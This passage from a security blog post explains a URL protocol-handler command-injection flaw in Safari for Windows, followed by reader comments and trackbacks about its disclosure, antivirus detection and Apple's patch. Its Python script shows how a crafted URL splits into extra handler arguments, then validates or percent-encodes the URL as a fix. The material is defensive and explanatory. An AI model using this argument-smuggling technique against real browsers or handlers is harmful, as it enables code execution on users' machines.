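                    j += 1
            else:
                cur.append("\\" * nb)
            have_arg, i = True, j
            continue
        if c == '"':
            in_quotes, have_arg = not in_quotes, True
        elif c in " \t" and not in_quotes:
            if have_arg:
                args.append("".join(cur))
                cur, have_arg = [], False
        else:
            cur.append(c)
            have_arg = True
        i += 1
    if have_arg:
        args.append("".join(cur))
    return args


# RFC 3986: scheme ":" followed only by unreserved, reserved or %XX characters.
_URL_RE = re.compile(
    r"^[A-Za-z][A-Za-z0-9+.\-]*:"
    r"(?:[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=]|%[0-9A-Fa-f]{2})*$"
)


def is_well_formed_url(url: str) -> bool:
    """Reject any URL containing characters outside the RFC 3986 set; a
    double quote or a space can never appear unescaped in a valid URL."""
    return _URL_RE.fullmatch(url) is not None


def percent_encode_url(url: str) -> str:
    """Alternative fix: escape anything that is not a valid URL character, so
    the value can never close the quotes in the handler template. A bare '%'
    is left alone on purpose so existing %XX escapes survive."""
    return quote(url, safe="-._~:/?#[]@!$&'()*+,;=%")


def naive_cmdline(url: str) -> str:
    """What a browser produces when it drops the URL into the template unfiltered."""
    return HANDLER_TEMPLATE.replace("%1", url)


def hardened_cmdline(url: str) -> str:
    """Validate first, then substitute; refuse to launch on bad input."""
    if not is_well_formed_url(url):
        raise ValueError("refusing to launch handler: URL contains invalid characters")
    return HANDLER_TEMPLATE.replace("%1", url)


if __name__ == "__main__":
    for url in (BENIGN_URL, INJECTED_URL):
        print("naive   :", split_windows_args(naive_cmdline(url)))
        print("encoded :", split_windows_args(naive_cmdline(percent_encode_url(url))))
```

Run stand-alone, the naive substitution of the constructed input yields six argv entries instead of four, with the made-up flag arriving as its own argument; after validation or percent-encoding the handler sees exactly one URL argument. Either fix belongs in the browser that builds the command line, which is the point Thor makes above about third-party handlers not being able to control how they are invoked.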
[...] engineers designed Safari to be secure from day one.” As Larholm explained on his blog, that may very well be correct: Its engineers obviously designed Safari to take advantage of [...]
great… I just installed safari for windows yesterday…. woop dee do.
[...] of Safari as ‘the world’s best browser’, despite its instability and the discovery of security [...]
haha! owned. Nice work! I should set this PoC as my safari homepage =P FireFox 4 Life
[...] hours after the launch of the public beta, security experts such as Aviv Raff, David Maynor and Thor Larholm had published findings on security flaws found in Safari 3, immediately overthrowing the claims made [...]
[...] that announced vulnerabilities in Safari shortly after its release are Aviv Raff, David Maynor and Thor Larholm. These guys claim several of the vulnerabilities they found could let an attacker remotely gain [...]
You forgot to mention it is a Beta release.
I guess coming from Windows you are probably used to Beta OS software being passed off to you as release standard.
For Strifer, and the other mac fanboys crying “it’s beta”, you should know that the implication of something being a Beta release has many different interpretations.
Historically, a beta release has limited distribution to some select power users who can then give feedback on an almost complete product.
When Steve Jobs announces Safari for Windows on stage at a major conference and apple.com links from the frontpage to its download then it is no longer a beta in the historical sense. It is instead a full on release, with your average Joe User visiting the webpage and seeing the bold black SAFARI 3, disregarding the grayed out Public Beta and thinking “ooh shiny”.
This release is intentionally not a beta in the historical sense, and tens of thousands of ordinary users, if not hundreds of thousands, will download and install this application.
[...] According to a news item from Golem.de, security expert Thor Larholm reports a serious security hole in the Windows version of Safari. Security expert Aviv Raff has found another bug in [...]
give em hell buddy!!….there are so many holes in the product that some HaXo4 is probably already resetting a botnet to climb into a bigger cave!!…so sad so sad…as a beta it will just bring more attention to the numerous holes in the rest of the product line….oh well guess they join the real world now hahaha….on the flip side what the hell are us vars who gotta support el customero numero uno supposed to do?? nice shiny products that sell well but do not work as promised are all too common in this industry as a whole….good work.
[...] both a stack corruption and an access violation, and then giving credit to Thor Larholm for posting a complete report on the calamity not an hour [...]
[...] Safari 3, in its version for Micro$oft Window$, has already been cracked. In just two hours, Thor Larholm was able to execute malicious (arbitrary) code on the local machine. The attacker could be [...]
[...] recently reported about Safari’s vulnerability wherein Thor Larholm published his exploits on the browser; while David Maynor found 6 bugs and 4 Denial of Service and 2 remote [...]
to those that keep regurgitating the “software running on winblows will allays be unsecure” line without thinking…
any OS that allows a user to execute arbitrary code is insecure (and any other OS is useless)… regardless of any poor security design that windows may have!
I use Linux and I could “pwn” (as the kids say) hundreds of other Linux users pretty easily by getting them to naively run my latest and greatest software or add my repository to their sources list. Windows will always be at a disadvantage by having, how shall I put this, the lowest common denominator of user.
The programmers at Microsoft made certain design decisions when they created Windows and whether you agree with them or not, that is the operating system you are programming for. If you fail to implement your own security you’re either lazy, arrogant or (most likely) simply overlooked it by mistake. If you don’t implement security because you don’t like the operating system and think it is inherently secure then, in my opinion, you just abandoned any moral-high ground.
Has this been fixed in the latest Safari (3.0.1?)
It doesn’t crash any more - still starts Firefox, but I can’t tell - the ‘exploit’ didn’t seem to do anything anyway under 3.0.
[...] Safari for Windows, 0day exploit in 2 hours [...]
[...] A detailed description of the exploit and a test page can be reached via the following link: Safari for Windows - the 2 hour exploit [...]
[...] version, however, only three security holes, apparently found by Apple itself. The holes discovered by Thor Larholm, Aviv Raff and David Maynor have evidently not yet been [...]
[...] Aviv Raff , David Maynor, and Thor Larholm all reported flaws in the browser shortly after it was made available on Monday. Maynor alone said [...]
[...] doesn’t offer anything that Firefox doesn’t have for Windows. Also judging from the security exploits that have already been released, it appears as though Apple has something to learn about developing browsers on Windows. [...]
[...] holes closed; unfortunately the following security holes remain open: the hole in the protocol handler; it is currently still unclear whether the bugs discovered by Aviv Raff and David Maynor have been closed [...]
When I installed Safari on my 64-bit Windows machine at work, all of the text (the browser main menus, dropdowns, the actual website content text, everything text basically) was being displayed as short 1px lines, not even the length of each word, all the same length.
So, utterly unusable; I couldn’t get past that first hurdle.
I assume something to do with the 64-bit thing.. (?)
[...] numerous security (1,2) concerns regarding Safari 3 on Windows, Apple has released an update to Safari fixing these [...]
[...] Security expert Thor Larholm claims he needed just two hours to create an exploit for a bug in Safari allowing him to start [...]
[...] has issued an update to Safari for Windows. According to Macworld, the update addresses a number of security issues: The security improvements in Safari Beta 3.0.1 include correction for a “command injection [...]
[...] releasing the Safari web browser earlier this week, and after security researchers quickly tore it apart, Apple releases a patched update. Bravo! It’s nice to see Apple quickly patch their [...]
I am really impressed!!
[...] who were gleefully picking apart Safari for Windows in search of bugs. My reporting led me to the blog of Larholm, who was among the Safari flaw [...]
Very insightful. And surely even if something is in “public beta” it shouldn’t crash doing very basic things. I mean, if one of my friends asked me to test a program he was working on and it crashed every time I opened a menu or saved, I’d just send it back until he fixed the basics. Betas should have dodgy graphics but sound code, not the other way round.
And to all you Mac fanboys out there, it’s rubbish like this coupled with those annoying “Mac is better than PC” ads and your holier-than-thou routine that stops me from even considering a Mac or OSX as an OS. At least Linux users will happily point out their own flaws and then give help to newbs in fixing them.
And to the person who said iTunes was good (not sure if it was this blog or another one), you know it uses more resources than WMP with reduced compatibility for 3rd parties. Plus its demand to be tied in with QuickTime and the iStore gives me a serious headache.
[...] Already within a few hours of the appearance of the “public beta”, the first critical exploits appeared. One of them is described here: http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/ [...]
[...] Larholm wrote a PoC exploit in just 2 hours, and shared his method and thoughts in “Safari for Windows, 0day exploit in 2 hours“. The attack can use an installed Firefox application and the Gopher URL protocol (other [...]
[...] for Windows is already in 3.0.1. No, they didn’t fix this flaw, they fixed the other one. Nonetheless, I’m [...]
Here is another bug:
http://lostmon.blogspot.com/2007/06/safari-301-552122-for-windows.html
So it wasn’t their best software release ever, although let’s remember it’s a beta. At least the intro was cool: http://thenewsroom.com/details/394435?c_id=wom-bc-js
[...] hours of launch, many users (notably, Thor Larholm and David Maynor, see their fuzzing findings at Thor’s Website) had discovered errors in the Safari programming. Just today, Apple launched a patch for the beta [...]
[...] Protocol Handler issue reported by Thor Larholm, CVE-2007-3186 [...]
[...] Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious [...]
[...] (his exploit also exists in Safari 2.0.4 on OSX), next was Aviv Raff’s, and last was Thor Larholm’s. Didn’t Steve Jobs say Safari was the best web browser in the world in his iPhone speech? [...]
[...] Safari for Windows, 0day exploit in 2 hours Episode #004 [26:23m]: Play Now | Play in Popup | Download [...]
[...] will moreover find their work made easier thanks to the inclusion of Safari, which has already proven to be as vulnerable as any other browser, and HTML-based mail in the [...]
[...] 3 beta release, several major security vulnerabilities were already discovered. Security researcher Thor Larholm posted on his blog, “I downloaded and installed Safari for Windows 2 hours ago, when I started writing this, and [...]
[...] Apple Safari internet browser for Windows for download. However, there have recently been some bugs in the Windows version that posed a security risk. Not such a great start for the [...]
The thing with This Link is that my Virus Scanner blocks it
[...] In going through the exploit, interesting, lots of work went into this, and I seriously doubt that they notified apple, so the usual disclosure route was not pushed out here. The way that they have stepped through the exploit, it looks plausible, but the test POC would have to be modified to make it malicious. Give the hackers about maybe 10 seconds to flip it around, and safari, and your PC no longer are yours. The logic behind this vulnerability is quite simple and the vulnerability class has been known and understood for years, namely that of protocol handler command injection. A browser typically consists of a multitude of different URL schemes, some of which are handled by internal functions and others that are handed off to external applications. On the OS X platform Apple has enjoyed the same luxury and the same curse as Internet Explorer has had on the Windows platform, namely intimate operating system knowledge. The integration with the originally intended operating system is tightly defined, but the breadth of knowledge is crippled when the software is released on other systems and mistakes and mishaps occur. You can still find references to the OS X proprietary URL protocols open-help-anchor: and network-diagnostics: inside the resource files for the Windows release. Source: Larholm [...]
NightKev, a number of AV companies have added detection for this attack vector.
According to virusscan.jotti.org the exploit is identified as “Trojan.Exploit.Html.Ffox.B” by ArcaVir, F-Secure Anti-Virus and Kaspersky Anti-Virus.
On the other hand, the exploit is not detected by A-Squared, AntiVir, Avast, AVG Antivirus, BitDefender, ClamAV, Dr.Web, F-Prot Anti-Virus, Fortinet, NOD32, Norman Virus Control, Panda Antivirus, Rising Antivirus, Sophos Antivirus, Virusbuster or VBA32.
Regards
Thor Larholm
[...] Internet Explorer 0day Exploit By Thor Larholm There is an input validation flaw in Internet Explorer that allows you to specify arbitrary arguments to the process responsible for handling URL protocols. This is the same type of input validation vulnerability that I discovered in the Safari 3 beta (see “Safari for Windows, 0day exploit in 2 hours“). [...]
[...] the zero-day exploit of Safari for Windows noted last month, and also discussed at MacOSXHints, the breach deals with a ‘URL handler‘, which allows [...]
[...] the zero-day exploit of Safari for Windows noted last month and also discussed at MacOSXHints, the breach deals with a ‘URL handler‘, which allows the [...]
[...] Thor’s post on Safari (windows) 0-day caused by improper URI handling [...]
I just came back to this because I discovered, during the recent buzz over the same kind of issue in IE in Firefox, that URIs passed to protocol handlers are actually meant to be unescaped.
So my previous conclusion in comment #135 is wrong: this issue is (was) squarely on Firefox!
[...] Dane Thor Larholm was among those who reported a problem in the new version of Safari. He claims that he [...]
[...] on this one, don’t think Safari doesn’t suffer from similar problems with security. Larholm.com found a security vulnerability in Safari 3 for Windows within 2 hours of it being launched by Apple [...]
[...] Safari for Windows, 0day exploit in 2 hours Source: Larholm.com [...]
[...] Safari hasn’t even made any impact, even with its attempt to push into the Windows market. Perhaps part of Safari’s problems are the immediate and embarrassing security issues that were uncovered within 2 hours of its download by Larholm. [...]
[...] speaking, this has not been a threat to a lot of people. Unlike the Safari 3.0 release for Windows, which received millions of end user installations after being featured [...]
I find it amusing that a security flaw discovered by Mr Larholm has an effect of an ego hit to the immature apple fanboyz.
Yeah. Windows versions have lots of bugs that are fixed after some time. Like this one, found recently:
Safari: submit, back, submit… ooops
[...] June 13th: Apparently there have already been several vulnerabilities found in [...]